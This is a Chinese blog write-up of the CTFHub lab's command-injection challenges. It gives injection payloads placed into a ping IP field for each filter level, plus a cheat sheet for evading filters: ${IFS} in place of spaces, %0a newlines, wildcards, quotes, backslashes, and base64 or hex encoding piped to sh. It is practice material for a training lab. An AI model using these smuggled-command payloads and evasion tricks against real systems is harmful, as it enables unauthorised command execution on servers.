CTFHUB-RCE-命令注入

最新推荐文章于 2024-03-27 16:11:41 发布
最新推荐文章于 2024-03-27 16:11:41 发布
阅读量1.2k 收藏 6
点赞数
分类专栏: CTFHUB
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/u014794539/article/details/118636836
版权

命令注入 无过滤

考点
属于是纯纯的命令注入
思路分析
构造playload

127.0.0.1|ls

1
发现一个数字串挺长的php
构造

127.0.0.1|cat 18930164348325.php

提交了[1]没有东西
可以构造

127.0.0.1|cat 18930164348325.php|base64

在这里插入图片描述

然后base64解码
在这里插入图片描述
或者不加base64
查看源码也能得到
在这里插入图片描述
playload:

ctfhub{af6df24d6b085066d0dc46d3}

过滤cat

考点
过滤cat 找个能代替的

cat 由第一行开始显示内容,并将所有内容输出
tac 从最后一行倒序显示内容,并将所有内容输出
more 根据窗口大小,一页一页的现实文件内容
less 和more类似,但其优点可以往前翻页,而且进行可以搜索字符
head 只显示头几行
tail 只显示最后几行
nl 类似于cat -n,显示时输出行号
tailf 类似于tail -f

做题过程
和无过滤类似 仅仅替换了cat
就是用playload

127.0.0.1|ls
127.0.0.1|less xxxxxx.php

然后查看源码即可得到flag

空格过滤

考点
就是过滤掉了空格 找能代替空格的代替就行了
使用IFS$9、%09、<、>、<>、{,}、%20、${IFS}、${IFS}来代替空格

127.0.0.1;cat${IFS}flag_64402731720130.php

其他过程都一样的

过滤目录分隔符

考点
过滤了目录分隔符 / 那么我们就 cd 命令进入对应的目录。
过程分析
多了个 flag_is_here还过滤了/
playload

127.0.0.1;cd flag_is_here;cat flag_585519785529.php |base64

其余过程同上

过滤运算符

考点
运算符替换
过程分析
过滤了 | 与 & ,使用 ; 分隔命令来代替
file | base64也可以写成base64 file
playload

127.0.0.1;cat flag_297281061019145.php  //再查看源码
127.0.0.1; base64 flag_297281061019145.php   //再解码

其余过程相似

综合过滤

考点
各种过滤的综合使用
解题思路
综合过滤 考虑各种绕过
在这里插入图片描述
在这里插入图片描述

%0a代替换行
%09代替TAB键(因为flag被过滤了,所以通过TAB来补全flag_is_here)
%5c 代替 \(用 \ 来分隔开 cat , cat 也被过滤了)
f***代替flag(正则)

查看目录
127.0.0.1%0acd${IFS}f***_is_here${IFS}%0als
查看文件内容(查看网页源代码得到flag)127.0.0.1%0acd${IFS}f***_is_here${IFS}%0amore${IFS}f***_4626112191746.php
base64输出flag 127.0.0.1%0acd${IFS}f***_is_here${IFS}%0abase64${IFS}f***_4626112191746.php

在这里插入图片描述
在这里插入图片描述

在这里插入图片描述

最后得到flag

ctfhub {cc9763fdb4b20c3a71891f39}

关键字过滤
方法一:特殊变量

$*
$@
$x    (x 代表 1-9)
${x}   (x>=10)

在没有传参的情况下,上面的特殊变量都是为空的

ca${21}t `a.txt

方法二:反斜杠

ca\t a.txt

方法三:变量替换

a=ca;b=t;c=a.txt;aaab $c

方法四:引号

c‘a‘t flag.php

方法五:编码绕过
Base64 编码绕过

root@kali:~/# echo ‘cat a.txt‘| base64 Y2F0IGEudHh0Cg==
root@kali:~/# echo ‘Y2F0IGEudHh0Cg==‘ | base64 -d abc

方法六:十六进制编码绕过

root@kali:~/# echo ‘cat a.txt‘ | xxd -p 63617420612e7478740a
root@kali:~/# echo ‘0x63617420612e7478740a‘| xxd -r -p Abc

方法七:通配符
?
*
[…]:匹配范围中任何一个字符 cat fl[abc]g.php
[a-z]:匹配 a-z 范围中任何一个字符 cat fl[a-z]g.php
{a,b}:对以逗号分割的文件列表进行拓展 cat fl{b,c}g.php
命令分隔与执行多条命令
1.&
& 表示将任务置于后台执行
2.&&
只有在 && 左边的命令返回真(命令返回值 $? == 0),&& 右边的命令才 会被执行。
3.|
| 表示管道,上一条命令的输出,作为下一条命令的参数
4.||
只有在 || 左边的命令返回假(命令返回值 $? == 1),|| 右边的命令才 会被执行。
5.;
多行语句用换行区分代码快,单行语句一般要用到分号来区分代码块
过滤bash?那就用sh
sh的大部分脚本都可以在bash下运行。

echo$IFS$1Y2F0IGZsYWcucGhw|base64$IFS$1-d|sh
Pale1c
关注
  • 0
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
laravel-8.4.2-rce
05-28
laravel-8.4.2-rce 设置环境 git clone https://github.com/laravel/laravel.git cd laravel git checkout e849812 composer install composer require facade/ignition==2.5.1 php artisan serve 用法 python3 ...
关于命令执行/注入 以及常见的一些绕过过滤的方法
小白渣的博客
02-29 1万+
打开题目直接给了源码, <?php $str=""; if(!empty($_GET)){ $str=$_GET["calc"]; } ?> 以及<?php echo "result:".shell_exec("echo $str | bc"); ?> 可以看出其没有对用户输入的内容进行一定过滤直接传给shell_exec函数执行。所以存在命令行漏洞。 这...
【WEB】命令注入(基础知识讲解及绕过姿势)(更新中)
weixin_45844670的博客
08-24 1037
通过web程序,在服务器上拼接系统命令。基础知识命令注入的条件:PHP执行系统命令的函数:&,&&,|,|| 的区别:漏洞利用服务器进行参数过滤空格代替截断符号利用base编码绕过过滤了敏感命令对比和文件上传漏洞对比和远程代码执行对比工具的使用防护白名单保护黑名单保护 基础知识 正常情况下,是ping一个IP地址。确定调用系统命令 确定可控字段 确定命令语句,&&可以连接两条Windows命令 命令注入的条件: web应用程序调用可执行系统命令的函数 执行系统命令
CTFHUB--RCE漏洞初步学习
qq_75120258的博客
03-27 643
关于RCE,在学习过程中其实已经接触到了很多,但在学习的时候都是这儿那儿一点一点的拼接起来的,所以看了很多大佬的博客,总结了一下,打算写一篇博客,好好的整理一下自己学习RCE所学到的东西。
CTFHub-Web-RCE-命令注入
qq_54037445的博客
11-29 1864
1、常见的拼接符1、A;B 先执行A,再执行B2、A & B 简单的拼接3、A | B 显示B的执行结果4、A&&B A执行成功之后才会执行B5、A || B A执行失败之后才会执行B, 在特殊情况下可代替空格2、常见的命令1.type 显示文本文件内容type x:\1.txt //显示x盘下的1.txt文件内容。
CTFHUBRCE(特详解)
小宇的web博客
06-15 3516
CTFHUBRCE 1.eval执行 1.先看一下靶机环境 2.先看一下php代码,这里要求将命令赋值给cmd然后执行 先看一下根目录文件/?cmd=system(“ls”); 这里的分号不能省略 没有有用的文件。查看上一级的文件夹/?cmd=system(“ls %20/”); 3.这里在进行抓取flag片段/?cmd=system(“cat%20/flag_29475”); 2.文件包含 1.先看靶机环境,点击shell会出现以下的页面,然后使用火狐的hackbar来进行postdata的注入
Java命令注入之防护
热门推荐
沧海一粟
07-16 1万+
1 Java中的命令注入 在Java中的Runtime.getRuntime本质就是使用ProcessBuilder,以ProcessBuilder里用ProcessImpl,start 的一个子进程执行命令, Java的native调用 a. Windows是CreateProcessW 创建子进程执行命令 b. Unix中以enecve 来创建子进程执行命令
ctfhub-命令注入
m0_62094846的博客
12-15 312
看到有Ping直接写127.0.0.1看看 可以成功,再输入命令 每个都试一次 两个文件都试过了,都没有flag 然后看看上一个文件夹 然后也一个个试了,也没用 后面的都是这样的 看wp,是在48892291724801.php里面 以后看到有点奇怪的要留心一些,可能包含了flag,然后它的回显也不一样,就是有数据出来的样子,但是没有数据,就看看源代码 ...
ctfhubRCE命令注入
weixin_43326436的博客
06-12 1853
一.实验环境ctfhub RCE知识点: rce分为远程执行ping,和远程代码执行evel。 漏洞出现原因:未在输入口做输入处理。 涉及到ping命令:ping是windows,linux系统下的一个命令,ping也属于一个通信协议,是TCP/IP协议的一部分,利用ping命令可以检查网络是否连通,可以很好的帮助我们分析和判定网络故障。 LINUX系统的管道符: 1," ; ": 执行完前面的语句在执行后面的语句。 2.“ | “: 显示后面的语句的执行结果。 3.” || “:当前的语句执行出错时,
CTF刷题记录CTFHub-RCE-命令注入
m_de_g的博客
07-24 3407
** CTFHub-RCE-命令注入 ** 一、解题思路 通过输入一些指令,利用某些特定的函数进行的操作,从而达到命令执行攻击的效果。 1.无任何的过滤 因为没有任何的过滤,那么我们可以直接使用分号(;)闭合前面的语句,执行ls命令 http://challenge-49bb6bc15fd9e3ef.sandbox.ctfhub.com:10800/?ip=127.0.0.1;ls 通过执行ls命令可以看到,该目下的文件,这是linux环境下 如果是window环境下,使用命令dir查看目录文件 我
CTFHub-rce
CN天狼
02-19 1212
CTFHub-rce
ctfhub RCE
2202_75317918的博客
01-27 721
ctfhub rce
Apache-druid-kafka-rce.yaml
最新发布
04-30
kafka相关RCE漏洞poc,扫描器的yaml文件,可以导入yara扫描器进行授权漏洞渗透测试。
第30天:WEB漏洞-RCE代码及命令执行漏洞全解1
08-03
WEB 漏洞-RCE 代码及命令执行漏洞全解在 Web 应用中有时候程序员为了考虑灵活性、简洁性,会在代码调用代码或命令执行函数去处理。比如当应用在调用一些能将
CVE-2021-21972-vCenter-6.5-7.0-RCE-POC
03-04
CVE-2021-21972-vCenter-6.5-7.0-RCE-POCpoc只需验证某人的路径的返回状态POC仅用于测试,未添加EXP模块POC仅用于测试,未加入exp模块
Apache-Solr-RCE-via-Velocity-template
03-09
Apache-Solr-RCE-Velocity模板突破产生原因:当攻击者可以直接访问Solr控制台时,可以通过发送类似/例程名/ config的POST请求该例程的配置文件进行更改。 Apache Solr内置IntegratedVelocityResponseWriter插件,在...
CTFHUB-SSRF(未完)
u014794539的博客
07-09 1395
内网访问 考点 内网访问… 分析过程 hint:尝试访问位于127.0.0.1的flag.php吧 http://challenge-961103965419959c.sandbox.ctfhub.com:10800/?url=_ 打开后是如此URL的空网页 构造playload http://challenge-961103965419959c.sandbox.ctfhub.com:10800/?url=127.0.0.1/flag.php 得到flagctfhub{507b549cdbc0cc91
CTFHUB-SQL注入-UA注入
u014794539的博客
07-10 1023
考点 SQL注入 UA注入 问题分析 他直说了UA注入点 可以跟Cookie注入一样弄 BP抓包发包 也可以直接sqlmap -u去跑 这几个题过程差不多 这里就用工具了 因为是UA注入了 所以用level3 python2 sqlmap.py -u http://challenge-81256235c2233d23.sandbox.ctfhub.com:10080/ --level 3 --dbs python2 sqlmap.py -u http://challenge-81256235
ctfhub rce
09-01
你想了解关于 CTFHubRCE(远程命令执行)相关内容吗?CTFHub 是一个针对CTF(Capture The Flag)竞赛的学习平台,而RCE是一种常见的漏洞类型之一。在CTFHub上,你可以学习如何发现和利用RCE漏洞来获取系统权限。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值